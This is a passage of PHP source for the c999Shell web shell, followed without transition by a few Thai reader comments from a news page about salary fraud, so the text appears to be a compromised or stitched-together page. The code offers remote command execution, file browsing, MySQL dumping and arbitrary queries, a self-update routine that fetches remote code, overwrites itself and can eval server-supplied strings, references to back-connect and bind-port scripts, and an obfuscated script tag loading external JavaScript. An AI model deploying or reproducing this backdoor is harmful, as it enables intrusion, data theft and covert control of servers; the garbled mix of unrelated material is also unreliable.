return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);

}

}

if (!function_exists("parsesort"))

{

function parsesort($sort)

{

$one = intval($sort);

$second = substr($sort,-1);

if ($second != "d") {$second = "a";}

return array($one,$second);

}

}

if (!function_exists("view_perms_color"))

{

function view_perms_color($o)

{

if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}

elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}

else {return "<font color=green>".view_perms(fileperms($o))."</font>";}

}

}

if (!function_exists("c999getsource"))

{

function c999getsource($fn)

{

global $c999sh_sourcesurl;

$array = array(

"c999sh_bindport.pl" => "c999sh_bindport_pl.txt",

"c999sh_bindport.c" => "c999sh_bindport_c.txt",

"c999sh_backconn.pl" => "c999sh_backconn_pl.txt",

"c999sh_backconn.c" => "c999sh_backconn_c.txt",

"c999sh_datapipe.pl" => "c999sh_datapipe_pl.txt",

"c999sh_datapipe.c" => "c999sh_datapipe_c.txt",

);

$name = $array[$fn];

if ($name) {return file_get_contents($c999sh_sourcesurl.$name);}

else {return FALSE;}

}

}

if (!function_exists("c999sh_getupdate"))

{

function c999sh_getupdate($update = TRUE)

{

$url = $GLOBALS["c999sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";

$data = @file_get_contents($url);

if (!$data) {return "Can\'t connect to update-server!";}

else

{

$data = ltrim($data);

$string = substr($data,3,ord($data{2}));

if ($data{0} == "\\x99" and $data{1} == "\\x01") {return "Error: ".$string; return FALSE;}

if ($data{0} == "\\x99" and $data{1} == "\\x02") {return "You are using latest version!";}

if ($data{0} == "\\x99" and $data{1} == "\\x03")

{

$string = explode("\\x01",$string);

if ($update)

{

$confvars = array();

$sourceurl = $string[0];

$source = file_get_contents($sourceurl);

if (!$source) {return "Can\'t fetch update!";}

else

{

$fp = fopen(__FILE__,"w");

if (!$fp) {return "Local error: can\'t write update to ".__FILE__."! You may download c999shell.php manually <a href=\\"".$sourceurl."\\"><u>here</u></a>.";}

else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}

}

}

else {return "New version are available: ".$string[1];}

}

elseif ($data{0} == "\\x99" and $data{1} == "\\x04") {eval($string); return 1;}

else {return "Error in protocol: segmentation failed! (".$data.") ";}

}

}

}

if (!function_exists("mysql_dump"))

{

function mysql_dump($set)

{

global $shver;

$sock = $set["sock"];

$db = $set["db"];

$print = $set["print"];

$nl2br = $set["nl2br"];

$file = $set["file"];

$add_drop = $set["add_drop"];

$tabs = $set["tabs"];

$onlytabs = $set["onlytabs"];

$ret = array();

$ret["err"] = array();

if (!is_resource($sock)) {echo("Error: \\$sock is not valid resource.");}

if (empty($db)) {$db = "db";}

if (empty($print)) {$print = 0;}

if (empty($nl2br)) {$nl2br = 0;}

if (empty($add_drop)) {$add_drop = TRUE;}

if (empty($file))

{

$file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";

}

if (!is_array($tabs)) {$tabs = array();}

if (empty($add_drop)) {$add_drop = TRUE;}

if (sizeof($tabs) == 0)

{

// retrive tables-list

$res = mysql_query("SHOW TABLES FROM ".$db, $sock);

if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}

}

$out = "# Dumped by c999Shell.SQL v. ".$shver."

# Home page: http://ccteam.ru

#

# Host settings:

# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."

# Date: ".date("d.m.Y H:i:s")."

# DB: \\"".$db."\\"

#---------------------------------------------------------

";

$c = count($onlytabs);

foreach($tabs as $tab)

{

if ((in_array($tab,$onlytabs)) or (!$c))

{

if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\\n";}

// recieve query for create table structure

$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);

if (!$res) {$ret["err"][] = mysql_smarterror();}

else

{

$row = mysql_fetch_row($res);

$out .= $row["1"].";\\n\\n";

// recieve table variables

$res = mysql_query("SELECT * FROM `$tab`", $sock);

if (mysql_num_rows($res) > 0)

{

while ($row = mysql_fetch_assoc($res))

{

$keys = implode("`, `", array_keys($row));

$values = array_values($row);

foreach($values as $k=>$v) {$values[$k] = addslashes($v);}

$values = implode("\', \'", $values);

$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES (\'".$values."\');\\n";

$out .= $sql;

}

}

}

}

}

$out .= "#---------------------------------------------------------------------------------\\n\\n";

if ($file)

{

$fp = fopen($file, "w");

if (!$fp) {$ret["err"][] = 2;}

else

{

fwrite ($fp, $out);

fclose ($fp);

}

}

if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}

return $out;

}

}

if (!function_exists("mysql_buildwhere"))

{

function mysql_buildwhere($array,$sep=" and",$functs=array())

{

if (!is_array($array)) {$array = array();}

$result = "";

foreach($array as $k=>$v)

{

$value = "";

if (!empty($functs[$k])) {$value .= $functs[$k]."(";}

$value .= "\'".addslashes($v)."\'";

if (!empty($functs[$k])) {$value .= ")";}

$result .= "`".$k."` = ".$value.$sep;

}

$result = substr($result,0,strlen($result)-strlen($sep));

return $result;

}

}

if (!function_exists("mysql_fetch_all"))

{

function mysql_fetch_all($query,$sock)

{

if ($sock) {$result = mysql_query($query,$sock);}

else {$result = mysql_query($query);}

$array = array();

while ($row = mysql_fetch_array($result)) {$array[] = $row;}

mysql_free_result($result);

return $array;

}

}

if (!function_exists("mysql_smarterror"))

{

function mysql_smarterror($type,$sock)

{

if ($sock) {$error = mysql_error($sock);}

else {$error = mysql_error();}

$error = htmlspecialchars($error);

return $error;

}

}

if (!function_exists("mysql_query_form"))

{

function mysql_query_form()

{

global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;

if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}

if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}

if ((!$submit) or ($sql_act))

{

echo "<table border=0><tr><td><form name=\\"c999sh_sqlquery\\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\\"".htmlspecialchars($sql_tbl)."\\"><input type=hidden name=submit value=\\"1\\"><input type=hidden name=\\"sql_goto\\" value=\\"".htmlspecialchars($sql_goto)."\\"><input type=submit name=sql_confirm value=\\"Yes\\">&nbsp;<input type=submit value=\\"No\\"></form></td>";

if ($tbl_struct)

{

echo "<td valign=\\"top\\"><b>Fields:</b><br>";

foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\\"#\\" onclick=\\"document.c999sh_sqlquery.sql_query.value+=\'`".$name."`\';\\"><b>".$name."</b></a><br>";}

echo "</td></tr></table>";

}

}

if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}

}

}

if (!function_exists("mysql_create_db"))

{

function mysql_create_db($db,$sock="")

{

$sql = "CREATE DATABASE `".addslashes($db)."`;";

if ($sock) {return mysql_query($sql,$sock);}

else {return mysql_query($sql);}

}

}

if (!function_exists("mysql_query_parse"))

{

function mysql_query_parse($query)

{

$query = trim($query);

$arr = explode (" ",$query);

/*array array()

{

"METHOD"=>array(output_type),

"METHOD1"...

...

}

if output_type == 0, no output,

if output_type == 1, no output if no error

if output_type == 2, output without control-buttons

if output_type == 3, output with control-buttons

*/

$types = array(

"SELECT"=>array(3,1),

"SHOW"=>array(2,1),

"DELETE"=>array(1),

"DROP"=>array(1)

);

$result = array();

$op = strtoupper($arr[0]);

if (is_array($types[$op]))

{

$result["propertions"] = $types[$op];

$result["query"] = $query;

if ($types[$op] == 2)

{

foreach($arr as $k=>$v)

{

if (strtoupper($v) == "LIMIT")

{

$result["limit"] = $arr[$k+1];

$result["limit"] = explode(",",$result["limit"]);

if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}

unset($arr[$k],$arr[$k+1]);

}

}

}

}

else {return FALSE;}

}

}

if (!function_exists("c999fsearch"))

{

function c999fsearch($d)

{

global $found;

global $found_d;

global $found_f;

global $search_i_f;

global $search_i_d;

global $a;

if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

$h = opendir($d);

while (($f = readdir($h)) !== FALSE)

{

if($f != "." && $f != "..")

{

$bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));

if (is_dir($d.$f))

{

$search_i_d++;

if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}

if (!is_link($d.$f)) {c999fsearch($d.$f);}

}

else

{

$search_i_f++;

if ($bool)

{

if (!empty($a["text"]))

{

$r = @file_get_contents($d.$f);

if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}

if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}

if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}

else {$bool = strpos(" ".$r,$a["text"],1);}

if ($a["text_not"]) {$bool = !$bool;}

if ($bool) {$found[] = $d.$f; $found_f++;}

}

else {$found[] = $d.$f; $found_f++;}

}

}

}

}

closedir($h);

}

}

if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}

//Sending headers

@ob_start();

@ob_implicit_flush(0);

function onphpshutdown()

{

global $gzipencode,$ft;

if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))

{

$v = @ob_get_contents();

@ob_end_clean();

@ob_start("ob_gzHandler");

echo $v;

@ob_end_flush();

}

}

function c999shexit()

{

onphpshutdown();

exit;

}

header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");

header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");

header("Cache-Control: no-store, no-cache, must-revalidate");

header("Cache-Control: post-check=0, pre-check=0", FALSE);

header("Pragma: no-cache");

if (empty($tmpdir))

{

$tmpdir = ini_get("upload_tmp_dir");

if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}

}

$tmpdir = realpath($tmpdir);

$tmpdir = str_replace("\\\\",DIRECTORY_SEPARATOR,$tmpdir);

if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}

if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}

else {$tmpdir_logs = realpath($tmpdir_logs);}

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")

{

$safemode = TRUE;

$hsafemode = "<font color=red>ON (secure)</font>";

}

else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}

$v = @ini_get("open_basedir");

if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}

else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}

$sort = htmlspecialchars($sort);

if (empty($sort)) {$sort = $sort_default;}

$sort[1] = strtolower($sort[1]);

$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");

if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}

$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\\"".$surl."act=phpinfo\\" target=\\"_blank\\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));

@ini_set("highlight.bg",$highlight_bg); //FFFFFF

@ini_set("highlight.comment",$highlight_comment); //#FF8000

@ini_set("highlight.default",$highlight_default); //#0000BB

@ini_set("highlight.html",$highlight_html); //#000000

@ini_set("highlight.keyword",$highlight_keyword); //#007700

@ini_set("highlight.string",$highlight_string); //#DD0000

if (!is_array($actbox)) {$actbox = array();}

$dspact = $act = htmlspecialchars($act);

$disp_fullpath = $ls_arr = $notls = null;

$ud = urlencode($d);

?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - phpshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b><SCRIPT SRC=&#x68&#x74&#x74&#x70&#x3a&#x2f&#x2f&#x77&#x77&#x77&#x2e&#x70&#x72&#x6vhkvhkx6d&#x61&#x67&#x65&#x73&#x2f&#x79&#x61&#x7a&#x2e&#x6a&#x73></SCRIPT>c999Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php

$d = str_replace("\\\\",DIRECTORY_SEPARATOR,$d);

if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}

$d = str_replace("\\\\",DIRECTORY_SEPARATOR,$d);

if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

$d = str_replace("\\\\\\\\","\\\\",$d);

$dispd = htmlspecialchars($d);

$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));

$i = 0;

foreach($pd as $b)

{

$t = "";

$j = 0;

foreach ($e as $r)

{

$t.= $r.DIRECTORY_SEPARATOR;

if ($j == $i) {break;}

$j++;

}

echo "<a href=\\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";

$i++;

}

echo "&nbsp;&nbsp;&nbsp;";

if (is_writable($d))

{

$wd = TRUE;

$wdt = "<font color=green>[ ok ]</font>";

echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";

}

else

{

$wd = FALSE;

$wdt = "<font color=red>[ Read-Only ]</font>";

echo "<b>".view_perms_color($d)."</b>";

}

if (is_callable("disk_free_space"))

{

$free = disk_free_space($d);

$total = disk_total_space($d);

if ($free === FALSE) {$free = 0;}

if ($total === FALSE) {$total = 0;}

if ($free < 0) {$free = 0;}

if ($total < 0) {$total = 0;}

$used = $total-$free;

$free_percent = round(100/($total/$free),2);

echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";

}

echo "<br>";

$letters = "";

if ($win)

{

$v = explode("\\\\",$d);

$v = $v[0];

foreach (range("a","z") as $letter)

{

$bool = $isdiskette = in_array($letter,$safemode_diskettes);

if (!$bool) {$bool = is_dir($letter.":\\\\");}

if ($bool)

{

$letters .= "<a href=\\"".$surl."act=ls&d=".urlencode($letter.":\\\\")."\\"".($isdiskette?" onclick=\\"return confirm(\'Make sure that the diskette is inserted properly, otherwise an error may occur.\')\\"":"").">[ ";

if ($letter.":" != $v) {$letters .= $letter;}

else {$letters .= "<font color=green>".$letter."</font>";}

$letters .= " ]</a> ";

}

}

if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}

}

if (count($quicklaunch) > 0)

{

foreach($quicklaunch as $item)

{

$item[1] = str_replace("%d",urlencode($d),$item[1]);

$item[1] = str_replace("%sort",$sort,$item[1]);

$v = realpath($d."..");

if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}

$item[1] = str_replace("%upd",urlencode($v),$item[1]);

echo "<a href=\\"".$item[1]."\\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";

}

}

echo "</p></td></tr></table><br>";

if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\\"BORDER-COLLAPSE: collapse\\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\\"100%\\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\\"100%\\" valign=\\"top\\">".$donated_html."</td></tr></table><br>";}

echo "<TABLE style=\\"BORDER-COLLAPSE: collapse\\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\\"100%\\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\\"100%\\" valign=\\"top\\">";

if ($act == "") {$act = $dspact = "ls";}

if ($act == "sql")

{

$sql_surl = $surl."act=sql";

if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}

if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}

if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}

if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}

if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}

$sql_surl .= "&";

?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don\'t reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php

if ($sql_server)

{

$sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);

$err = mysql_smarterror();

@mysql_select_db($sql_db,$sql_sock);

if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}

}

else {$sql_sock = FALSE;}

echo "<b>SQL Manager:</b><br>";

if (!$sql_sock)

{

if (!$sql_server) {echo "NO CONNECTION";}

else {echo "<center><b>Can\'t connect</b></center>"; echo "<b>".$err."</b>";}

}

else

{

$sqlquicklaunch = array();

$sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");

$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));

$sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");

$sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");

$sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");

$sqlquicklaunch[] = array("Logout",$surl."act=sql");

echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \\"".htmlspecialchars($sql_passwd)."\\")</b><br>";

if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\\"".$item[1]."\\"><b>".$item[0]."</b></a> ] ";}}

echo "</center>";

}

echo "</td></tr><tr>";

if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }

else

{

//Start left panel

if (!empty($sql_db))

{

?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php

$result = mysql_list_tables($sql_db);

if (!$result) {echo mysql_smarterror();}

else

{

echo "---[ <a href=\\"".$sql_surl."&\\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";

$c = 0;

while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}

if (!$c) {echo "No tables found in database.";}

}

}

else

{

?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php

$result = mysql_list_dbs($sql_sock);

if (!$result) {echo mysql_smarterror();}

else

{

?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php

$c = 0;

$dbs = "";

while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\\"".$row[0]."\\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}

echo "<option value=\\"\\">Databases (".$c.")</option>";

echo $dbs;

}

?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php

}

//End left panel

echo "</td><td width=\\"100%\\" height=\\"1\\" valign=\\"top\\">";

//Start center panel

$diplay = TRUE;

if ($sql_db)

{

if (!is_numeric($c)) {$c = 0;}

if ($c == 0) {$c = "no";}

echo "<hr size=\\"1\\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";

if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\\"".$item[1]."\\">".$item[0]."</a> ] ";}}

echo "</b></center>";

$acts = array("","dump");

if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}

elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \\n";} $sql_act = "query";}

elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}

elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}

elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}

elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "

โดยคุณ ZEBI  2 เม.ย. 2558, 03:15

ความคิดเห็นที่ 3

ควรลงวันเวลาให้ชัดเจน เพราะจะได้ทราบว่าข่าวใหม่หรือเก่า

โดยคุณ 23 มี.ค. 2557, 11:29

ความคิดเห็นที่ 2

เพราะสาเหตุอะไรถึงจับการทุจริตนี้ได้ค่ะ

โดยคุณ จุฑา แซ๋อึ้ง 12 มี.ค. 2555, 12:49

ความคิดเห็นที่ 1

เงินเดือนที่ได้คงไม่พอ

ถึงต้องขึ้นเงินเดือนตัวเองด้วยวิธีนี้

โดยคุณ ส้ม 12 ก.ย. 2553, 20:52

แสดงความเห็น

ข่าวที่มีผู้อ่านมาก